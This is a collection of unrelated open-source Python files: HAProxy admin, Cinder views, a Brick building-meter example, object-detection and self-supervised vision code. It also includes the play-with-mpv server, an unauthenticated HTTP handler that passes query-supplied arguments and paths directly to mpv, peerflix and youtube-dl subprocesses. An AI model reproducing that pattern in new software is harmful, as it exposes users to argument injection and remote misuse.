return False
def __ne__(self, other):
return (not self.__eq__(other))
@property
def iid(self):
"""Return the unique proxy ID of the frontend.
.. note::
Because proxy ID is the same across all processes,
we return the proxy ID from the 1st process.
:rtype: ``int``
"""
return int(self._frontend_per_proc[0].iid)
@should_die
def disable(self):
"""Disable frontend.
:param die: control the handling of errors.
:type die: ``bool``
:return: ``True`` if frontend is disabled otherwise ``False``.
:rtype: bool
:raise: If ``die`` is ``True``
:class:`haproxyadmin.exceptions.CommandFailed` or
:class:`haproxyadmin.exceptions.MultipleCommandResults` is raised
when something bad happens otherwise returns ``False``.
"""
cmd = "disable frontend {}".format(self.name)
results = cmd_across_all_procs(self._frontend_per_proc, 'command', cmd)
return check_command(results)
@should_die
def enable(self):
"""Enable frontend.
:param die: control the handling of errors.
:type die: ``bool``
:return: ``True`` if frontend is enabled otherwise ``False``.
:rtype: bool
:raise: If ``die`` is ``True``
:class:`haproxyadmin.exceptions.CommandFailed` or
:class:`haproxyadmin.exceptions.MultipleCommandResults` is raised
when something bad happens otherwise returns ``False``.
"""
cmd = "enable frontend {}".format(self.name)
results = cmd_across_all_procs(self._frontend_per_proc, 'command', cmd)
return check_command(results)
def metric(self, name):
"""Return the value of a metric.
Performs a calculation on the metric across all HAProxy processes.
The type of calculation is either sum or avg and defined in
:data:`haproxyadmin.utils.METRICS_SUM` and
:data:`haproxyadmin.utils.METRICS_AVG`.
:param name: metric name to retrieve
:type name: any of :data:`haproxyadmin.haproxy.FRONTEND_METRICS`
:return: value of the metric
:rtype: ``integer``
:raise: ``ValueError`` when a given metric is not found
"""
if name not in FRONTEND_METRICS:
raise ValueError("{} is not valid metric".format(name))
metrics = [x.metric(name) for x in self._frontend_per_proc]
metrics[:] = (converter(x) for x in metrics)
metrics[:] = (x for x in metrics if x is not None)
return calculate(name, metrics)
@property
def maxconn(self):
"""Return the configured maximum connection allowed for frontend.
:rtype: ``integer``
"""
return self.metric('slim')
@should_die
def setmaxconn(self, value):
"""Set maximum connection to the frontend.
:param die: control the handling of errors.
:type die: ``bool``
:param value: max connection value.
:type value: ``integer``
:return: ``True`` if value was set.
:rtype: ``bool``
:raise: If ``die`` is ``True``
:class:`haproxyadmin.exceptions.CommandFailed` or
:class:`haproxyadmin.exceptions.MultipleCommandResults` is raised
when something bad happens otherwise returns ``False``.
Usage::
>>> from haproxyadmin import haproxy
>>> hap = haproxy.HAProxy(socket_dir='/run/haproxy')
>>> frontend = hap.frontend('frontend1_proc34')
>>> frontend.maxconn
>>> frontend.setmaxconn(50000)
True
>>> frontend.maxconn
100000
"""
if not isinstance(value, int):
raise ValueError("Expected integer and got {}".format(type(value)))
cmd = "set maxconn frontend {} {}".format(self.name, value)
results = cmd_across_all_procs(self._frontend_per_proc, 'command', cmd)
return check_command(results)
@property
def name(self):
"""Return the name of the frontend.
:rtype: ``string``
"""
return self._name
@property
def process_nb(self):
"""Return a list of process number in which frontend is configured.
:rtype: ``list``
Usage::
>>> from haproxyadmin import haproxy
>>> hap = haproxy.HAProxy(socket_dir='/run/haproxy')
>>> frontend = hap.frontend('frontend2_proc34')
>>> frontend.process_nb
[4, 3]
"""
process_numbers = []
for frontend in self._frontend_per_proc:
process_numbers.append(frontend.process_nb)
return process_numbers
@property
def requests(self):
"""Return the number of requests.
:rtype: ``integer``
Usage::
>>> from haproxyadmin import haproxy
>>> hap = haproxy.HAProxy(socket_dir='/run/haproxy')
>>> frontend = hap.frontend('frontend2_proc34')
>>> frontend.requests
5
"""
return self.metric('req_tot')
def requests_per_process(self):
"""Return the number of requests for the frontend per process.
:return: a list of tuples with 2 elements
#. process number of HAProxy
#. requests
:rtype: ``list``
Usage::
>>> from haproxyadmin import haproxy
>>> hap = haproxy.HAProxy(socket_dir='/run/haproxy')
>>> frontend = hap.frontend('frontend2_proc34')
>>> frontend.requests_per_process()
[(4, 2), (3, 3)]
"""
results = cmd_across_all_procs(self._frontend_per_proc, 'metric',
'req_tot')
return results
@should_die
def shutdown(self):
"""Disable the frontend.
.. warning::
           HAProxy removes the frontend from the running configuration, so
further operations on the frontend will return an error.
:rtype: ``bool``
"""
cmd = "shutdown frontend {}".format(self.name)
results = cmd_across_all_procs(self._frontend_per_proc, 'command', cmd)
return check_command(results)
def stats_per_process(self):
"""Return all stats of the frontend per process.
:return: a list of tuples with 2 elements
#. process number
#. a dict with all stats
:rtype: ``list``
"""
results = cmd_across_all_procs(self._frontend_per_proc, 'stats')
return results
@property
def status(self):
"""Return the status of the frontend.
:rtype: ``string``
:raise: :class:`IncosistentData` exception if status is different
per process
Usage::
>>> from haproxyadmin import haproxy
>>> hap = haproxy.HAProxy(socket_dir='/run/haproxy')
>>> frontend = hap.frontend('frontend2_proc34')
>>> frontend.status
'OPEN'
"""
results = cmd_across_all_procs(self._frontend_per_proc, 'metric',
'status')
return compare_values(results)
|
cinder/api/v3/views/attachments.py | lightsey/cinder | 571 | 11087095 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import timeutils
class ViewBuilder(object):
"""Model an attachment API response as a python dictionary."""
_collection_name = "attachments"
@staticmethod
def _normalize(date):
if date:
return timeutils.normalize_time(date)
return ''
@classmethod
def detail(cls, attachment, flat=False):
"""Detailed view of an attachment."""
result = cls.summary(attachment, flat=True)
result.update(
attached_at=cls._normalize(attachment.attach_time),
detached_at=cls._normalize(attachment.detach_time),
attach_mode=attachment.attach_mode,
connection_info=attachment.connection_info)
if flat:
return result
return {'attachment': result}
@staticmethod
def summary(attachment, flat=False):
"""Non detailed view of an attachment."""
result = {
'id': attachment.id,
'status': attachment.attach_status,
'instance': attachment.instance_uuid,
'volume_id': attachment.volume_id, }
if flat:
return result
return {'attachment': result}
@classmethod
def list(cls, attachments, detail=False):
"""Build a view of a list of attachments."""
func = cls.detail if detail else cls.summary
return {'attachments': [func(attachment, flat=True) for attachment in
attachments]}
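if __name__ == "__main__":
    # Illustrative sketch (not part of Cinder): render a stand-in attachment
    # through the view builder. Real callers pass a VolumeAttachment object;
    # every field below is a made-up placeholder.
    from types import SimpleNamespace
    fake_attachment = SimpleNamespace(
        id="attachment-uuid", attach_status="attached",
        instance_uuid="instance-uuid", volume_id="volume-uuid",
        attach_time=None, detach_time=None, attach_mode="rw",
        connection_info={"driver_volume_type": "iscsi"})
    print(ViewBuilder.summary(fake_attachment))  # {'attachment': {...}}
    print(ViewBuilder.detail(fake_attachment))   # adds attach/detach times etc.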
|
server.py | ivaylo-iliev/play-with-mpv | 254 | 11087138 | #!/usr/bin/env python
# Plays MPV when instructed to by a chrome extension =]
import sys
from subprocess import Popen
from shutil import which
PORT = 7531
# Use --public if you want the server and extension on different computers
hostname = 'localhost'
if '--public' in sys.argv:
hostname = '0.0.0.0'
if sys.version_info[0] < 3: # python 2
import BaseHTTPServer
import urlparse
class CompatibilityMixin:
def send_body(self, msg):
self.wfile.write(msg+'\n')
self.wfile.close()
else: # python 3
import http.server as BaseHTTPServer
import urllib.parse as urlparse
class CompatibilityMixin:
def send_body(self, msg):
self.wfile.write(bytes(msg+'\n', 'utf-8'))
class Handler(BaseHTTPServer.BaseHTTPRequestHandler, CompatibilityMixin):
def respond(self, code, body=None):
self.send_response(code)
self.send_header("Content-type", "text/plain")
self.end_headers()
if body:
self.send_body(body)
def play_with_mpv(self, query):
mpv_command='mpv'
if "list" in query:
list_url = 'https://www.youtube.com/playlist?list={}'.format(
query["list"][0])
ytdl_format = ''
if "mpv_args" in query:
if query["mpv_args"] is not None:
ytdl_format = '--ytdl-format={}'.format(query["mpv_args"][0])
return Popen([mpv_command, list_url, '--force-window'] +
query.get("mpv_args", []))
else:
mpv_options = ''
urls = str(query["play_url"][0])
return Popen([mpv_command, urls, '--force-window'] +
query.get("mpv_args", []))
def play_with_celluloid(self, query):
if which('celluloid') is not None:
# Playlist support
urls = ''
if "list" in query:
urls += str("&list={}".format(query["list"][0]))
mpv_command = 'celluloid'
mpv_options = []
# Translate mpv options to celluloid
for mpv_arg in query["mpv_args"]:
if '--ytdl-format' in mpv_arg:
mpv_options.append(mpv_arg.replace(
'--ytdl-format=', '--mpv-ytdl-format="') + '"')
else:
mpv_options.append(mpv_arg)
return Popen([mpv_command, urls] + mpv_options)
def do_GET(self):
mpv_command='mpv'
try:
url = urlparse.urlparse(self.path)
query = urlparse.parse_qs(url.query)
except:
query = {}
if query.get('mpv_args'):
print("MPV ARGS:", query.get('mpv_args'))
mpv_command = 'mpv'
if('mpv_player' in query):
mpv_command = query['mpv_player'][0]
if "play_url" in query:
urls = str(query["play_url"][0])
if urls.startswith('magnet:') or urls.endswith('.torrent'):
pipe = Popen(['peerflix', '-k', urls, '--', '--force-window'] +
query.get("mpv_args", []))
else:
if mpv_command == 'mpv':
pipe = self.play_with_mpv(query)
elif mpv_command == 'celluloid':
pipe = self.play_with_celluloid(query)
self.respond(200, "playing...")
elif "cast_url" in query:
urls = str(query["cast_url"][0])
if urls.startswith('magnet:') or urls.endswith('.torrent'):
print(" === WARNING: Casting torrents not yet fully supported!")
with Popen(['mkchromecast', '--video',
'--source-url', 'http://localhost:8888']):
pass
pipe.terminate()
else:
pipe = Popen(['mkchromecast', '--video', '-y', urls])
self.respond(200, "casting...")
elif "fairuse_url" in query:
urls = str(query["fairuse_url"][0])
location = query.get("location", ['~/Downloads/'])[0]
if "%" not in location:
location += "%(title)s.%(ext)s"
print("downloading ", urls, "to", location)
if urls.startswith('magnet:') or urls.endswith('.torrent'):
msg = " === ERROR: Downloading torrents not yet supported!"
print(msg)
self.respond(400, msg)
else:
pipe = Popen(['youtube-dl', urls, '-o', location] +
query.get('ytdl_args', []))
self.respond(200, "downloading...")
else:
self.respond(400)
def start():
httpd = BaseHTTPServer.HTTPServer((hostname, PORT), Handler)
print("serving on {}:{}".format(hostname, PORT))
try:
httpd.serve_forever()
except KeyboardInterrupt:
print(" shutting down...")
httpd.shutdown()
if __name__ == '__main__':
start()
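# Illustrative example requests for the Handler above (URLs, ports and paths
# are placeholders; query values must be URL-encoded):
#   http://localhost:7531/?play_url=https%3A%2F%2Fexample.com%2Fvideo
#   http://localhost:7531/?play_url=...&mpv_args=--ytdl-format%3Dbest&mpv_player=celluloid
#   http://localhost:7531/?cast_url=https%3A%2F%2Fexample.com%2Fvideo
#   http://localhost:7531/?fairuse_url=https%3A%2F%2Fexample.com%2Fvideo&location=~/Downloads/
# Each query string maps onto a branch of Handler.do_GET.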
|
platform/coredb/coredb/models/artifacts.py | admariner/polyaxon | 3,200 | 11087139 |
#!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from coredb.abstracts.artifacts import BaseArtifact, BaseArtifactLineage
class Artifact(BaseArtifact):
class Meta:
app_label = "coredb"
unique_together = (("name", "state"),)
db_table = "db_artifact"
class ArtifactLineage(BaseArtifactLineage):
class Meta:
app_label = "coredb"
unique_together = (("run", "artifact", "is_input"),)
db_table = "db_artifactlineage"
|
mlcomp/db/providers/dag_storage.py | sUeharaE4/mlcomp | 166 | 11087149 |
from mlcomp.db.models import DagStorage, File, DagLibrary
from mlcomp.db.providers.base import BaseDataProvider
class DagStorageProvider(BaseDataProvider):
model = DagStorage
def by_dag(self, dag: int):
query = self.query(DagStorage, File).join(File, isouter=True). \
filter(DagStorage.dag == dag). \
order_by(DagStorage.path)
return query.all()
class DagLibraryProvider(BaseDataProvider):
model = DagLibrary
def dag(self, dag: int):
return self.query(DagLibrary.library, DagLibrary.version). \
filter(DagLibrary.dag == dag).all()
__all__ = ['DagStorageProvider', 'DagLibraryProvider']
|
transformer_courses/BERT_distillation/PaddleSlim-develop/paddleslim/common/rl_controller/__init__.py | wwhio/awesome-DeepLearning | 1,150 | 11087189 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from ..log_helper import get_logger
_logger = get_logger(__name__, level=logging.INFO)
try:
import parl
from .ddpg import *
except ImportError as e:
pass
from .lstm import *
from .utils import *
|
mmdet/models/dense_heads/obb/odm_head.py | voinSR/OBBDetection | 274 | 11087205 | import torch
from mmcv.cnn import ConvModule, normal_init, bias_init_with_prob
from mmdet.ops.orn import ORConv2d, RotationInvariantPooling
from torch import nn
from mmdet.core import get_bbox_dim, build_bbox_coder, build_assigner, build_sampler, build_anchor_generator, \
multi_apply, images_to_levels, force_fp32
from .obb_anchor_head import OBBAnchorHead
from mmdet.models.builder import HEADS, build_loss
@HEADS.register_module()
class ODMHead(OBBAnchorHead):
def __init__(self,
num_classes,
in_channels,
feat_channels=256,
stacked_convs=4,
with_orconv=False,
bbox_type='obb',
reg_dim=None,
anchor_generator=None,
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=(.0, .0, .0, .0),
target_stds=(1.0, 1.0, 1.0, 1.0)),
reg_decoded_bbox=False,
background_label=None,
loss_cls=dict(
type='CrossEntropyLoss',
use_sigmoid=True,
loss_weight=1.0),
loss_bbox=dict(
type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0),
conv_cfg=None,
norm_cfg=None,
train_cfg=None,
test_cfg=None):
super(OBBAnchorHead, self).__init__()
self.in_channels = in_channels
self.num_classes = num_classes
self.stacked_convs = stacked_convs
self.conv_cfg = conv_cfg
self.norm_cfg = norm_cfg
self.feat_channels = feat_channels
self.bbox_type = bbox_type
self.reg_dim = get_bbox_dim(self.bbox_type) \
if reg_dim is None else reg_dim
self.use_sigmoid_cls = loss_cls.get('use_sigmoid', False)
# TODO better way to determine whether sample or not
self.sampling = loss_cls['type'] not in [
'FocalLoss', 'GHMC', 'QualityFocalLoss'
]
if self.use_sigmoid_cls:
self.cls_out_channels = num_classes
else:
self.cls_out_channels = num_classes + 1
if self.cls_out_channels <= 0:
raise ValueError(f'num_classes={num_classes} is too small')
self.reg_decoded_bbox = reg_decoded_bbox
self.background_label = (
num_classes if background_label is None else background_label)
# background_label should be either 0 or num_classes
assert (self.background_label == 0
or self.background_label == num_classes)
self.bbox_coder = build_bbox_coder(bbox_coder)
self.loss_cls = build_loss(loss_cls)
self.loss_bbox = build_loss(loss_bbox)
self.train_cfg = train_cfg
self.test_cfg = test_cfg
if self.train_cfg:
self.assigner = build_assigner(self.train_cfg.assigner)
# use PseudoSampler when sampling is False
if self.sampling and hasattr(self.train_cfg, 'sampler'):
sampler_cfg = self.train_cfg.sampler
else:
sampler_cfg = dict(type='PseudoSampler')
self.sampler = build_sampler(sampler_cfg, context=self)
self.fp16_enabled = False
self.with_orconv = with_orconv
if anchor_generator is None:
# Will Pass By S2AHead
self.anchor_generator = None
self.num_anchors = 1
self.with_prior = True
else:
self.anchor_generator = build_anchor_generator(anchor_generator)
# usually the numbers of anchors for each level are the same
# except SSD detectors
self.num_anchors = self.anchor_generator.num_base_anchors[0]
self.with_prior = False
self._init_layers()
def _init_layers(self):
"""Initialize layers of the head."""
self.relu = nn.ReLU(inplace=True)
if self.with_orconv:
self.or_conv = ORConv2d(self.feat_channels, int(
self.feat_channels / 8), kernel_size=3, padding=1, arf_config=(1, 8))
self.or_pool = RotationInvariantPooling(256, 8)
self.reg_convs = nn.ModuleList()
self.cls_convs = nn.ModuleList()
for i in range(self.stacked_convs):
chn = int(self.feat_channels /
8) if i == 0 and self.with_orconv else self.feat_channels
self.reg_convs.append(
ConvModule(
self.feat_channels,
self.feat_channels,
3,
stride=1,
padding=1))
self.cls_convs.append(
ConvModule(
chn,
self.feat_channels,
3,
stride=1,
padding=1))
self.odm_cls = nn.Conv2d(
self.feat_channels, self.cls_out_channels, 3, padding=1)
self.odm_reg = nn.Conv2d(self.feat_channels, 5, 3, padding=1)
def init_weights(self):
"""Initialize weights of the head."""
if self.with_orconv:
normal_init(self.or_conv, std=0.01)
for m in self.cls_convs:
normal_init(m.conv, std=0.01)
for m in self.reg_convs:
normal_init(m.conv, std=0.01)
bias_cls = bias_init_with_prob(0.01)
normal_init(self.odm_cls, std=0.01, bias=bias_cls)
normal_init(self.odm_reg, std=0.01)
def forward_single(self, x):
"""Forward feature of a single scale level.
Args:
x (Tensor): Features of a single scale level.
Returns:
tuple:
cls_score (Tensor): Cls scores for a single scale level
the channels number is num_anchors * num_classes.
bbox_pred (Tensor): Box energies / deltas for a single scale
                    level, the channels number is num_anchors * 5.
"""
skip_cls = self.test_cfg.get('skip_cls', False)
if self.with_orconv:
x = self.or_conv(x)
# reg
reg_feat = x
for reg_conv in self.reg_convs:
reg_feat = reg_conv(reg_feat)
bbox_pred = self.odm_reg(reg_feat)
if self.training or not skip_cls:
if self.with_orconv:
cls_feat = self.or_pool(x)
else:
cls_feat = x
for cls_conv in self.cls_convs:
cls_feat = cls_conv(cls_feat)
cls_score = self.odm_cls(cls_feat)
else:
cls_score = None
return cls_score, bbox_pred
def get_prior_anchors(self,
featmap_sizes,
refine_anchors,
img_metas,
is_train=True,
device='cuda'):
num_levels = len(featmap_sizes)
refine_anchors_list = []
for img_id, img_meta in enumerate(img_metas):
mlvl_refine_anchors = []
for i in range(num_levels):
refine_anchor = refine_anchors[i][img_id].reshape(-1, 5)
mlvl_refine_anchors.append(refine_anchor)
refine_anchors_list.append(mlvl_refine_anchors)
valid_flag_list = []
if is_train:
for img_id, img_meta in enumerate(img_metas):
multi_level_flags = self.anchor_generator.valid_flags(
featmap_sizes, img_meta['pad_shape'], device)
valid_flag_list.append(multi_level_flags)
return refine_anchors_list, valid_flag_list
def loss(self,
cls_scores,
bbox_preds,
gt_obboxes,
gt_labels,
prior_anchors,
img_metas,
gt_bboxes_ignore=None):
if prior_anchors is None:
assert not self.with_prior
return super().loss(cls_scores, bbox_preds, gt_obboxes, gt_labels, img_metas, gt_bboxes_ignore)
else:
assert self.with_prior
featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
assert len(featmap_sizes) == self.anchor_generator.num_levels
device = cls_scores[0].device
anchor_list, valid_flag_list = self.get_prior_anchors(
featmap_sizes, prior_anchors, img_metas, device=device)
label_channels = self.cls_out_channels if self.use_sigmoid_cls else 1
cls_reg_targets = self.get_targets(
anchor_list,
valid_flag_list,
gt_obboxes,
img_metas,
gt_bboxes_ignore_list=gt_bboxes_ignore,
gt_labels_list=gt_labels,
label_channels=label_channels)
if cls_reg_targets is None:
return None
(labels_list, label_weights_list, bbox_targets_list, bbox_weights_list,
num_total_pos, num_total_neg) = cls_reg_targets
num_total_samples = (
num_total_pos + num_total_neg if self.sampling else num_total_pos)
# anchor number of multi levels
num_level_anchors = [anchors.size(0) for anchors in anchor_list[0]]
# concat all level anchors and flags to a single tensor
concat_anchor_list = []
for i in range(len(anchor_list)):
concat_anchor_list.append(torch.cat(anchor_list[i]))
all_anchor_list = images_to_levels(concat_anchor_list,
num_level_anchors)
losses_cls, losses_bbox = multi_apply(
self.loss_single,
cls_scores,
bbox_preds,
all_anchor_list,
labels_list,
label_weights_list,
bbox_targets_list,
bbox_weights_list,
num_total_samples=num_total_samples)
return dict(loss_cls=losses_cls, loss_bbox=losses_bbox)
@force_fp32(apply_to=('cls_scores', 'bbox_preds'))
def get_bboxes(self,
cls_scores,
bbox_preds,
prior_anchors,
img_metas,
cfg=None,
rescale=False):
if prior_anchors is None:
assert not self.with_prior
return super(ODMHead, self).get_bboxes(cls_scores, bbox_preds, img_metas, cfg, rescale)
else:
assert self.with_prior
assert len(cls_scores) == len(bbox_preds)
num_levels = len(cls_scores)
device = cls_scores[0].device
featmap_sizes = [cls_scores[i].shape[-2:] for i in range(num_levels)]
refine_anchors = self.get_prior_anchors(
featmap_sizes, prior_anchors, img_metas, is_train=False, device=device)
mlvl_anchors = refine_anchors[0][0]
result_list = []
for img_id in range(len(img_metas)):
cls_score_list = [
cls_scores[i][img_id].detach() for i in range(num_levels)
]
bbox_pred_list = [
bbox_preds[i][img_id].detach() for i in range(num_levels)
]
img_shape = img_metas[img_id]['img_shape']
scale_factor = img_metas[img_id]['scale_factor']
proposals = self._get_bboxes_single(cls_score_list, bbox_pred_list,
mlvl_anchors, img_shape,
scale_factor, cfg, rescale)
result_list.append(proposals)
return result_list
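if __name__ == '__main__':
    # Minimal smoke test, not part of the original module. It assumes the
    # OBBDetection fork of mmdet (with its compiled ops) is installed; the
    # num_classes, feature size and test_cfg values are arbitrary.
    head = ODMHead(num_classes=15, in_channels=256, test_cfg=dict(skip_cls=False))
    head.init_weights()
    feat = torch.randn(2, 256, 32, 32)
    cls_score, bbox_pred = head.forward_single(feat)
    # cls_score: (2, 15, 32, 32) with sigmoid-based classification,
    # bbox_pred: (2, 5, 32, 32) holding the five oriented-box deltas.
    print(cls_score.shape, bbox_pred.shape)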
|
examples/building_meter/generate.py | BrickSchema/brick | 146 | 11087244 |
import brickschema
from brickschema.namespaces import A, OWL, BRICK, UNIT
from rdflib import Namespace, Literal
# our entities will live in this namespace
BLDG = Namespace("urn:example#")
# create a graph for our model
g = brickschema.Graph()
g.bind("bldg", BLDG)
# define a building in a site
g.add((BLDG["mysite"], A, BRICK.Site))
g.add((BLDG["mybldg"], A, BRICK.Building))
g.add((BLDG["mysite"], BRICK.hasPart, BLDG["mybldg"]))
# add a full building meter to the building
g.add((BLDG["meter"], A, BRICK.Building_Electrical_Meter))
g.add((BLDG["mybldg"], BRICK.isLocationOf, BLDG["meter"]))
# add sensors to the meter...
# energy sensor
g.add((BLDG["building_energy_sensor"], A, BRICK.Energy_Sensor))
g.add((BLDG["building_energy_sensor"], BRICK.isPointOf, BLDG["meter"]))
g.add((BLDG["building_energy_sensor"], BRICK.hasUnit, UNIT["KiloW-HR"]))
timeseries_props = [
(BRICK.hasTimeseriesId, Literal("a7523b08-7bc7-4a9d-8e88-8c0cd8084be0"))
]
g.add((BLDG["building_energy_sensor"], BRICK.timeseries, timeseries_props))
# power sensor
g.add((BLDG["building_power_sensor"], A, BRICK.Electrical_Power_Sensor))
g.add((BLDG["building_power_sensor"], BRICK.isPointOf, BLDG["meter"]))
g.add((BLDG["building_power_sensor"], BRICK.hasUnit, UNIT["KiloW"]))
timeseries_props = [
(BRICK.hasTimeseriesId, Literal("fd64fbc8-0742-4e1e-8f88-e2cd8a3d78af"))
]
g.add((BLDG["building_power_sensor"], BRICK.timeseries, timeseries_props))
# peak demand sensor
g.add((BLDG["building_peak_demand"], A, BRICK.Peak_Power_Demand_Sensor))
g.add((BLDG["building_peak_demand"], BRICK.isPointOf, BLDG["meter"]))
g.add((BLDG["building_peak_demand"], BRICK.hasUnit, UNIT["KiloW"]))
other_props = [
(BRICK.aggregationFunction, Literal("max")),
(BRICK.aggregationWindow, Literal("RP1D")),
]
g.add((BLDG["building_peak_demand"], BRICK.aggregate, other_props))
timeseries_props = [
(BRICK.hasTimeseriesId, Literal("bcf9a85d-696c-446a-a2ac-97207ecfbc56"))
]
g.add((BLDG["building_peak_demand"], BRICK.timeseries, timeseries_props))
# save the file
g.serialize("building_meter.ttl", format="ttl")
|
analysis/extract_pattern/extract_topk_cluster.py | taokong/ibot | 327 | 11087252 |
# Copyright (c) ByteDance, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
import os
import math
import argparse
import torch.backends.cudnn as cudnn
import torch
import torch.distributed as dist
import numpy as np
import models
import utils
from PIL import ImageFile
from tqdm import tqdm
from torchvision import transforms
from torch.utils.data import DataLoader
from models.head import iBOTHead
from PIL import Image, ImageDraw
from loader import ImageFolderInstance
ImageFile.LOAD_TRUNCATED_IMAGES = True
def concat_all_gather(tensor):
"""
Performs all_gather operation on the provided tensors.
*** Warning ***: torch.distributed.all_gather has no gradient.
"""
tensors_gather = [torch.ones_like(tensor)
for _ in range(torch.distributed.get_world_size())]
torch.distributed.all_gather(tensors_gather, tensor, async_op=False)
output = torch.cat(tensors_gather, dim=0)
return output
def main():
parser = argparse.ArgumentParser("The first stage of BoostrapSelfSup")
parser.add_argument('--local_rank', default=-1, type=int, help='node rank for distributed parallel')
parser.add_argument('--arch', default='vit_small', type=str, choices=['vit_tiny', 'vit_small', 'vit_base',
'vit_large', 'swin_tiny','swin_small', 'swin_base', 'swin_large', 'resnet50', 'resnet101'], help='Architecture.')
parser.add_argument('--data_path', default='/path/to/imagenet/val/', type=str,
help='Please specify path to the ImageNet validation data.')
parser.add_argument("--pretrained_path", type=str, default="", help="the pretraining models")
parser.add_argument("--checkpoint_key", default="teacher", type=str, help="""Key to use in the checkpoint
(Default: teacher)""")
parser.add_argument("--save_path", type=str, default="", help="where to save the memory_bank")
parser.add_argument("--batch_size", type=int, default=32, help="batch size")
parser.add_argument("--patch_size", type=int, default=16, help="patch size")
parser.add_argument("--img_size", type=int, default=224, help="image size")
parser.add_argument("--patch_window", type=int, default=5, help="patch visualize window")
parser.add_argument("--out_dim", type=int, default=8192, help="out_dim")
parser.add_argument("--type", type=str, default='patch', choices=['cls', 'patch'], help="""wether to visualize
patterns on patch level or cls level.""")
parser.add_argument("--topk", type=int, default=196, help="topk")
parser.add_argument("--show_pics", type=int, default=100, help="show pics of topk cluster with most items")
parser.add_argument("--chunks", type=int, default=16, help="""Number of counting chunks. Set this larger (e.g., 128
for DINO w/ 65536 out dim) when the model output dimension is large to avoid memory overflow.""")
args = parser.parse_args()
pretrained_path = os.path.expanduser(args.pretrained_path)
save_path = os.path.expanduser(args.save_path)
batch_size = args.batch_size
dist.init_process_group(backend='nccl')
torch.cuda.set_device(args.local_rank)
network = models.__dict__[args.arch](
patch_size=args.patch_size,
return_all_tokens=True,
)
network = utils.MultiCropWrapper(network, iBOTHead(
network.embed_dim,
args.out_dim,
patch_out_dim=args.out_dim,
act='gelu',
shared_head=True,
))
network.cuda(args.local_rank)
try:
utils.restart_from_checkpoint(pretrained_path, **{args.checkpoint_key: network})
except:
network = torch.nn.parallel.DistributedDataParallel(network, device_ids=[args.local_rank])
utils.restart_from_checkpoint(pretrained_path, **{args.checkpoint_key: network})
cudnn.benchmark = True
augmentation = transforms.Compose([
transforms.Resize(args.img_size // 7 * 8),
transforms.CenterCrop(args.img_size),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
train_dataset = ImageFolderInstance(args.data_path, transform=augmentation)
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset, shuffle=False, rank=args.local_rank)
n_train_points = len(train_dataset)
train_dataloader = DataLoader(train_dataset, batch_size=batch_size, sampler=train_sampler, pin_memory=True, num_workers=10)
try:
data = torch.load(os.path.join(args.save_path, f'memory_{args.type}.pth'))
memory_bank = data['memory_bank']
num_per_cluster = data.get('num_per_cluster', None)
except:
memory_bank = None
num_per_cluster = None
network.eval()
train_sampler.set_epoch(0)
for data in tqdm(train_dataloader):
idx, img, _ = data
idx = idx.cuda(args.local_rank, non_blocking=True)
img = img.cuda(args.local_rank, non_blocking=True)
feature = network(img)[1].contiguous() if args.type == \
'patch' else network(img)[0].contiguous()
feature = concat_all_gather(feature).detach().cpu()
idx = concat_all_gather(idx)
if memory_bank is None:
print("Initializing memory_bank bank: {} points.".format(n_train_points))
memory_bank = torch.zeros(n_train_points, feature.size(1), 2) if \
args.type == 'patch' else torch.zeros(n_train_points, 2)
memory_bank = memory_bank.to("cpu").detach()
with torch.no_grad():
memory_bank[idx] = torch.stack(feature.max(-1), dim=-1)
torch.save(
{'memory_bank': memory_bank},
os.path.join(args.save_path, f'memory_{args.type}.pth'),
)
if num_per_cluster is None and args.local_rank == 0:
num_per_cluster = torch.Tensor([])
all_dim = torch.arange(args.out_dim).chunk(args.chunks)
for i in tqdm(all_dim):
mask = memory_bank[..., 1, None] == i.view(1, 1, -1)
num_per_cluster = torch.cat((num_per_cluster, mask.sum((0,1))))
torch.save(
{'memory_bank': memory_bank,
'num_per_cluster': num_per_cluster},
os.path.join(args.save_path, f'memory_{args.type}.pth'),
)
if args.local_rank == 0:
patterns = {}
for i in num_per_cluster.topk(args.show_pics)[1]:
mask = memory_bank[..., 1] == i
if args.type == 'patch':
values, spatial_id = (memory_bank[..., 0] * mask).max(-1)
values, instance_id = torch.topk(values, args.topk * 2)
spatial_id = spatial_id[instance_id]
npatch = args.img_size // args.patch_size
height_id = spatial_id // npatch
width_id = spatial_id % npatch
indices = torch.stack((instance_id, height_id, width_id), dim=-1)
else:
values, indices = torch.topk((memory_bank[..., 0] * mask), args.topk)
patterns[i.item()] = indices
augmentation = transforms.Compose([
transforms.Resize(args.img_size // 7 * 8),
transforms.CenterCrop(args.img_size),
])
train_dataset = ImageFolderInstance(args.data_path, transform=augmentation)
for nrank, (cluster, idxs) in enumerate(patterns.items()):
size = math.ceil(args.topk ** 0.5) # 6
unit = args.patch_size if args.type == 'patch' else args.img_size # 16/224
vis_unit = (unit * args.patch_window) if args.type == 'patch' else unit # 80/224
img = Image.new('RGB', (size * vis_unit, size * vis_unit))
